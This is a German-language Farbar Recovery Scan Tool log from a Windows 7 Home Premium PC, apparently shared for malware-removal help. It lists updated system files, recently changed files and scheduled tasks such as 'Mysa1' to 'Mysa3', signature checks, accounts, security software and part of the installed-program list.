2017-08-09 17:32 - 2017-07-14 03:53 - 002767872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2017-08-09 17:32 - 2017-07-14 03:50 - 001314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2017-08-09 17:32 - 2017-07-14 03:48 - 000710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2017-08-09 17:32 - 2017-07-08 17:34 - 000370920 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys
2017-08-09 17:32 - 2017-07-08 17:00 - 003224064 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-08-09 17:32 - 2017-07-07 17:37 - 000631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2017-08-09 17:32 - 2017-07-07 17:33 - 005547752 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-08-09 17:32 - 2017-07-07 17:33 - 000706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2017-08-09 17:32 - 2017-07-07 17:33 - 000363752 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\volmgrx.sys
2017-08-09 17:32 - 2017-07-07 17:33 - 000154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2017-08-09 17:32 - 2017-07-07 17:33 - 000095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2017-08-09 17:32 - 2017-07-07 17:31 - 001732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 001460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 001212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 001163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000731648 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000149504 _____ (Microsoft Corporation) C:\Windows\system32\t2embed.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:29 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:15 - 004001000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2017-08-09 17:32 - 2017-07-07 17:15 - 003945192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2017-08-09 17:32 - 2017-07-07 17:13 - 001314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2017-08-09 17:32 - 2017-07-07 17:11 - 001114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2017-08-09 17:32 - 2017-07-07 17:11 - 000666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2017-08-09 17:32 - 2017-07-07 17:11 - 000275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-08-09 17:32 - 2017-07-07 17:11 - 000261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2017-08-09 17:32 - 2017-07-07 17:11 - 000254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2017-08-09 17:32 - 2017-07-07 17:11 - 000223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2017-08-09 17:32 - 2017-07-07 17:11 - 000172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2017-08-09 17:32 - 2017-07-07 17:11 - 000141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2017-08-09 17:32 - 2017-07-07 17:11 - 000109568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\t2embed.dll
2017-08-09 17:32 - 2017-07-07 17:11 - 000096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2017-08-09 17:32 - 2017-07-07 17:11 - 000082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2017-08-09 17:32 - 2017-07-07 17:11 - 000065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2017-08-09 17:32 - 2017-07-07 17:11 - 000043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2017-08-09 17:32 - 2017-07-07 17:11 - 000022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2017-08-09 17:32 - 2017-07-07 17:11 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000554496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:10 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 17:02 - 000148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2017-08-09 17:32 - 2017-07-07 17:01 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2017-08-09 17:32 - 2017-07-07 17:01 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2017-08-09 17:32 - 2017-07-07 17:01 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2017-08-09 17:32 - 2017-07-07 16:58 - 000338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2017-08-09 17:32 - 2017-07-07 16:57 - 000296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2017-08-09 17:32 - 2017-07-07 16:54 - 000291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-08-09 17:32 - 2017-07-07 16:54 - 000159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-08-09 17:32 - 2017-07-07 16:54 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-08-09 17:32 - 2017-07-07 16:53 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2017-08-09 17:32 - 2017-07-07 16:53 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2017-08-09 17:32 - 2017-07-07 16:51 - 000050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2017-08-09 17:32 - 2017-07-07 16:48 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2017-08-09 17:32 - 2017-07-07 16:48 - 000014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2017-08-09 17:32 - 2017-07-07 16:48 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2017-08-09 17:32 - 2017-07-07 16:48 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2017-08-09 17:32 - 2017-07-07 16:47 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2017-08-09 17:32 - 2017-07-07 16:47 - 000006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 16:47 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 16:47 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2017-08-09 17:32 - 2017-07-07 16:47 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2017-08-09 17:32 - 2017-07-01 15:05 - 001311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msjet40.dll
2017-08-09 17:32 - 2017-07-01 15:05 - 000866816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mswdat10.dll
2017-08-09 17:32 - 2017-07-01 15:05 - 000641536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mswstr10.dll
2017-08-09 17:32 - 2017-07-01 15:05 - 000616448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrepl40.dll
2017-08-09 17:32 - 2017-07-01 15:05 - 000475648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxbde40.dll
2017-08-09 17:32 - 2017-07-01 15:05 - 000375808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mspbde40.dll
2017-08-09 17:32 - 2017-07-01 15:05 - 000343552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrd3x40.dll
2017-08-09 17:32 - 2017-07-01 15:05 - 000339968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msexcl40.dll
2017-08-09 17:32 - 2017-07-01 15:05 - 000310272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrd2x40.dll
2017-08-09 17:32 - 2017-07-01 15:05 - 000240640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msltus40.dll
2017-08-09 17:32 - 2017-07-01 15:05 - 000144896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msjint40.dll
2017-08-09 17:32 - 2017-07-01 15:05 - 000083968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msjter40.dll
2017-08-07 17:30 - 2017-08-07 17:30 - 000256840 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\cudart32_65.dll
2017-07-30 22:03 - 2017-08-24 19:49 - 000000077 _____ C:\Windows\system32\ps
2017-07-30 15:34 - 2017-08-20 19:24 - 000003500 _____ C:\Windows\System32\Tasks\Mysa3

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-08-24 19:51 - 2014-05-21 17:37 - 000000000 ____D C:\FRST
2017-08-24 19:49 - 2017-07-02 14:59 - 000000075 _____ C:\Windows\system32\p
2017-08-24 19:49 - 2017-05-06 15:59 - 000000060 _____ C:\Windows\system32\s
2017-08-24 19:49 - 2013-02-19 20:54 - 000000000 ____D C:\ProgramData\VMware
2017-08-24 19:49 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2017-08-24 19:49 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\Help
2017-08-24 19:05 - 2013-07-22 19:53 - 000000000 ____D C:\Tools
2017-08-24 19:03 - 2014-05-21 17:36 - 002395648 _____ (Farbar) C:\Users\a_omuell\Desktop\FRST64.exe
2017-08-24 17:59 - 2009-07-14 06:45 - 000015568 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-08-24 17:59 - 2009-07-14 06:45 - 000015568 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-08-24 17:49 - 2014-06-06 19:29 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-08-24 17:37 - 2016-11-20 11:30 - 000000000 ____D C:\Users\a_omuell\AppData\LocalLow\Mozilla
2017-08-24 17:26 - 2015-06-02 20:43 - 000002912 _____ C:\Windows\wininit.ini
2017-08-24 17:00 - 2012-06-12 18:47 - 000000000 ____D C:\Windows\system32\Macromed
2017-08-24 17:00 - 2010-09-08 10:02 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2017-08-23 17:52 - 2016-04-29 20:20 - 000000000 ____D C:\Users\a_omuell\AppData\Roaming\vlc
2017-08-23 17:41 - 2010-11-03 10:45 - 000702404 _____ C:\Windows\system32\perfh007.dat
2017-08-23 17:41 - 2010-11-03 10:45 - 000151038 _____ C:\Windows\system32\perfc007.dat
2017-08-23 17:41 - 2009-07-14 07:13 - 001628962 _____ C:\Windows\system32\PerfStringBackup.INI
2017-08-23 17:41 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\inf
2017-08-20 19:24 - 2017-07-01 17:57 - 000003420 _____ C:\Windows\System32\Tasks\Mysa2
2017-08-20 19:24 - 2017-07-01 17:57 - 000003188 _____ C:\Windows\System32\Tasks\Mysa1
2017-08-20 19:24 - 2017-07-01 17:57 - 000003184 _____ C:\Windows\System32\Tasks\ok
2017-08-18 16:40 - 2011-03-14 19:26 - 000000000 ____D C:\Marine
2017-08-17 18:12 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\rescache
2017-08-11 18:08 - 2011-01-16 10:54 - 000000000 ____D C:\DATA
2017-08-10 17:58 - 2009-07-14 06:45 - 000343320 _____ C:\Windows\system32\FNTCACHE.DAT
2017-08-09 22:00 - 2013-07-16 19:25 - 000000000 ____D C:\Windows\system32\MRT
2017-08-09 21:58 - 2011-01-16 17:43 - 140394280 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-08-07 17:30 - 2009-07-14 07:08 - 000032632 _____ C:\Windows\Tasks\SCHEDLGU.TXT

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2011-01-04 23:02 - 2011-01-04 23:02 - 000000017 _____ () C:\Users\a_omuell\AppData\Local\resmon.resmoncfg
2010-11-03 02:20 - 2010-11-03 02:23 - 000016660 _____ () C:\ProgramData\ArcadeDeluxe4.log
2010-09-08 09:41 - 2010-03-03 00:59 - 000131984 _____ () C:\ProgramData\FullRemove.exe

Einige Dateien in TEMP:
====================
2011-09-14 17:12 - 2011-09-14 17:12 - 000465920 _____ (Realtek Semiconductor Corp.) C:\Users\a_omuell\AppData\Local\Temp\COMAP.EXE
2014-06-14 18:02 - 2014-06-14 18:02 - 019168944 _____ (Adobe Systems Incorporated) C:\Users\a_omuell\AppData\Local\Temp\fp_pl_pfs_installer.exe
2011-01-05 20:04 - 2010-08-13 11:41 - 000468232 _____ (Microsoft Corporation) C:\Users\a_omuell\AppData\Local\Temp\MSN5EF3.exe

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-08-12 13:10

==================== Ende von FRST.txt ============================

 

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 20-08-2017
durchgeführt von a_omuell (24-08-2017 19:54:11)
Gestartet von C:\Users\a_omuell\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2011-01-05 17:46:29)
Start-Modus: Normal
==========================================================

==================== Konten: =============================

Administrator (S-1-5-21-4004736709-471984187-2621406794-500 - Administrator - Disabled)
a_omuell (S-1-5-21-4004736709-471984187-2621406794-1000 - Administrator - Enabled) => C:\Users\a_omuell
Gast (S-1-5-21-4004736709-471984187-2621406794-501 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Microsoft Security Essentials (Enabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189}
AS: Microsoft Security Essentials (Enabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

7-Zip 9.20 (HKLM-x32\...\7-Zip) (Version:  - )
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Acer Arcade Deluxe (HKLM-x32\...\{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version: 4.0.8012 - CyberLink Corp.) Hidden
Acer Arcade Deluxe (HKLM-x32\...\InstallShield_{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version: 4.0.8012 - CyberLink Corp.)
Acer Arcade Movie (HKLM-x32\...\{B906C11A-D193-4143-9FA7-E2EE8A5A8F21}) (Version: 9.0.6625 - CyberLink Corp.) Hidden
Acer Backup Manager (HKLM-x32\...\InstallShield_{72B776E5-4530-4C4B-9453-751DF87D9D93}) (Version: 2.0.0.68 - NewTech Infosystems)
